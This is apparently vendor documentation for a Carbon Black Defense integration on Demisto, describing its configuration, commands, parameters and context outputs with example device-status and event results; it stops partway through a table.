Carbon Black Defense
Overview
Use the Carbon Black Defense integration to manage Carbon Black policies, devices and processes on Demisto.
Use cases
- Get information about events, policies, devices, and processes on Carbon Black.
- Update events, policies, devices, and processes on Carbon Black.
- Delete rules from policies.
- Create new policies.
Configure Carbon Black Defense on Demisto
- Navigate to Settings > Integrations > Servers & Services.
- Search for Carbon Black Defense.
-
Click
Add instance
to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
- Click Test to validate the URLs, token, and connection.
Commands
- Get the status of multiple devices: cbd-get-devices-status
- Get the status of a specified device: cbd-get-device-status
- Change the security policy assigned to a device: cbd-change-device-status
- Get multiple events: cbd-find-events
- Get a specified event: cbd-find-event
- Get multiple processes: cbd-find-processes
- Get alert details: cbd-get-alert-details
- Get all policy details: cbd-get-policies
- Get the details of a specified policy: cbd-get-policy
- Create a policy: cbd-create-policy
- Update a policy: cbd-update-policy
- Delete a policy: cbd-delete-policy
- Add a rule to a policy: cbd-add-rule-to-policy
- Delete a rule from a policy: cbd-delete-rule-from-policy
- Update a rule in a policy: cbd-update-rule-in-policy
- Set a policy: cbd-set-policy
Get the status of multiple devices
Retrieves the status of multiple devices, as specified by further input.
Base Command
cbd-get-devices-status
Input
| Parameter | Description | More Information |
| hostName |
Host name of the device to search for. |
Case insensitive |
| hostNameExact | Exact host name of device to search for | Case sensitive |
| ownerName |
Device owner name |
Case insensitive |
| ownerNameExact | Exact device owner name | Case sensitive |
| ipAddress | External or internal IP address of the device to search for | - |
| start |
Shows result from this row and after |
- |
| rows |
Maximum number of rows of result. |
This parameter can be limited on the Cb Defense server side |
Context Output
| Path | Description |
| CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime | Activation code expiry time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastLocation | Last location |
| CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime | Last shutdown time |
| CarbonBlackDefense.GetDevicesStatus.Results.OsVersion | Operating system version |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyId | Policy ID |
| CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime | Registered time |
| CarbonBlackDefense.GetDevicesStatus.Results.Status | Status |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceId | Device ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId | Device owner ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Description | Device type |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDevicesStatus.Results.Email | Email address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastContact | Last contact |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName | Organization name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorStates | Sensor states |
| CarbonBlackDefense.GetDevicesStatus.Results.AvStatus | AV status |
| CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.Name | Name |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyName | Policy name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDevicesStatus.Results.TestId | Test ID |
Command Example
!cbd-get-devices-status rows="1"
Context Example
CarbonBlackDefense:{} 1 item
GetDevicesStatus:{} 1 item
Results:{} 25 items
ActivationCodeExpiryTime:1524157210454
AvStatus:null
LastContact:1533646970617
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | 1524157210454 |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533646970617 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
Get the status of a specified device
Retrieves the status of a specified device.
Base Code
cbd-get-device-status
Input
| Parameter | Description |
| deviceId |
Individual device ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | AV status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Time of registration |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics Time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-get-device-status deviceId="844355"
Context Example
CarbonBlackDefense:{} 1 item
GetDeviceStatus:{} 1 item
DeviceInfo:{} 25 items
ActivationCodeExpiryTime:null
AvStatus:null
LastContact:1533648166041
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533648166041 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
Change the security policy assigned to a device
Changes the security policy assigned to a specified device.
Base Command
cbd-change-device-status
Input
| Parameter | Description |
| deviceId |
The device ID |
| policyId |
The policy ID |
| policyName |
The policy name |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | Anti-virus status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Registration time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Time of last report |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-change-device-status deviceId="844355" policyName="default"
Context Example
CarbonBlackDefense:{} 1 item
ChangeDeviceStatus:{} 1 item
DeviceInfo:{} 24 items
AvStatus:null
LastContact:1533648445513
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| AvStatus | |
|---|---|
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533648445513 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
| SensorStates | ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED |
Get multiple events
Returns multiple event details, as specified by further input.
Base Command
cbd-find-events
Input
| Parameter | Description | More Information |
| hostName |
The host name of the event to search for |
Case in sensitive. |
| hostNameExact | The exact host name of the event to find | Case sensitive. |
| ownerName | Owner name of the event to search for | Case in sensitive. |
| ownerNameExact | The exact owner name of the event to search for | Case sensitive. |
| ipAddress |
External or internal IP address |
- |
| sha256hash |
Searches for events generated by a process with this SHA-256 hash |
Must be in lowercase. |
| applicationName |
Searches for events generated by a process with this application name |
Must be in lowercase. |
| eventType | Searches for events associated with this event type | - |
| searchWindow |
Events generated within this time frame |
Default is one day. Events might not be available after 30 days due to retention policies. |
| start | Shows result from this row and after | - |
| rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
| CarbonBlackDefense.FindEvents.Results.EventType | Event type |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart | Milliseconds since the beginning of the process |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name | Name |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.FindEvents.Results.ShortDescription | Short description |
| CarbonBlackDefense.FindEvents.Results.CreateTime | Time of creation |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName | Policy name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation | Agent location |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address | IpV4 address of the device |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email | Email address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.FindEvents.Results.EventId | Event ID |
| CarbonBlackDefense.FindEvents.Results.EventTime | Event time |
| CarbonBlackDefense.FindEvents.Results.LongDescription | Long description |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress | Dest address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort | Dest port |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn | Peer Fqdn |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress | Peer IP address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address | Peer IpV4 address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.Service | Service |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress | Source address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort | Source port |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName | Application name |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath | Application path |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash | MD5 hash |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.FindEvents.Results.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-events rows=1
</p?
Context Example
CarbonBlackDefense:{} 1 item
FindEvents:{} 2 items
Results:{} 10 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
SelectedApp:{} 7 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
EffectiveReputation:LOCAL_WHITE
EffectiveReputationSource:PRE_EXISTING
Md5Hash:b43632f807770d141008deb988a65ad9
ReputationProperty:NOT_LISTED
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 12 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceLocation:{} 6 items
City:null
CountryCode:US
CountryName:United States
Latitude:37.751007
Longitude:-97.822
Region:null
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
PolicyName:default
TargetApp:{} 5 items
ApplicationName:null
EffectiveReputation:null
EffectiveReputationSource:null
ReputationProperty:null
Sha256Hash:null
ProcessDetails:{} 11 items
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
MilisSinceProcessStart:147443253
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
TotalResults:{} 1 item
TotalResults:10666
Endpoint:{} 4 items
Domain:null
Hostname:cberninger-mac2
IPAddress:67.143.208.113
OS:MAC
Process:{} 9 items
Path:null
SHA1:null
ParentID:null
PID:1071
Name:cloud-drive-ui
Endpoint:null
ParentName:null
MD5:null
CommandLine:null
Human Readable
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
| DeviceDetails PolicyName | default |
| DeviceDetails TargetPriorityCode | 1 |
| DeviceDetails TargetPriorityType | MEDIUM |
| EventId | 4ad25ae99a4911e88515b3c49ffeda59 |
| EventTime | 1533649991975 |
Get a specified event
Returns a the details of a specified event.
Base Command
cbd-find-event
Input
| Parameter | Description |
| eventId | Event ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription | Short description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash | MD5 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId | Organization ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName | Organization name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType | Organization type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address | Device IpV4 address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email | Email address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation | Agent location path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName | Device host name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName | Group name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName | Full user name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name | Name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine | Parent command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine | Command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart | Milisecconds since process start |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine | Target command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid | Target PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid | Parent private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName | Target name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid | Target private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"
Context Example
CarbonBlackDefense:{} 1 item
FindEvent:{} 1 item
EventInfo:{} 13 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 13 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceHostName:null
GroupName:null
DeviceLocation:{} 10 items
CountryName:United States
CountryCode:US
DmaCode:0
MetroCode:0
City:null
Latitude:37.751007
Longitude:-97.822
Region:null
PostalCode:null
AreaCode:0
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
ProcessDetails:{} 15 items
ParentPid:null
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
ParentPrivatePid:null
MilisSinceProcessStart:147443253
ParentName:null
ParentCommandLine:null
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
ParentHash:{} 2 items
ApplicationName:null
Sha256Hash:null
ProcessHash:{} 5 items
ApplicationName:null
ApplicationPath:null
Md5Hash:null
ReputationProperty:null
Sha256Hash:null
ThreatIndicators:[] 2 items
0:UNKNOWN_APP
1:NETWORK_FLOW
OrgDetails:{} 3 items
OrganizationId:null
OrganizationName:null
OrganizationType:null
TargetHash:{} 3 items
ApplicationName:null
ReputationProperty:null
Sha256Hash:null
Human Readable Output
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
| DeviceDetails DeviceHostName | |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
